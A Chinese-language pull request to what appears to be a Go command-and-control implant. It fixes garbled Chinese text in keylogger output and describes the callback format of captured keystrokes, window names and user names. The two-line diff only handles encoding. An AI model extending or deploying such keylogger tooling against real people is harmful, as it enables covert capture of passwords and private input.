### PR TITLE
修复keylogger中中文乱码

### DIFF
--- a/packet/jobs.go
+++ b/packet/jobs.go
@@ -428,6 +428,8 @@ func ReadNamedPipe(pipeName []byte, callbackType int, sleepTime uint16) (string,
 				if err != nil {
 					fmt.Printf("convertData2UTF8 error: %v\n", err)
 				}
+			} else {
+				send = resultBytes
 			}
 
 			DataProcess(callbackType, send)


### PR DESCRIPTION
## 修复前

![image](https://user-images.githubusercontent.com/44094753/216292202-e126c990-5c75-4b75-ae42-f9ef1101fb05.png)

## 修复后

![image](https://user-images.githubusercontent.com/44094753/216292365-a41f4571-fb30-431f-9d28-05b9254fc549.png)

## 修复依据

分析回传数据格式：

回传数据结构：`data(ParseAnArgLittle) | length(4Bytes) | windowsName(ParseAnArgLittle) | userName(ParseAnArgLittle)`

当callbackType为CALLBACK_KEYSTROKES时，回传数据的data中字符串需转换为UTF8编码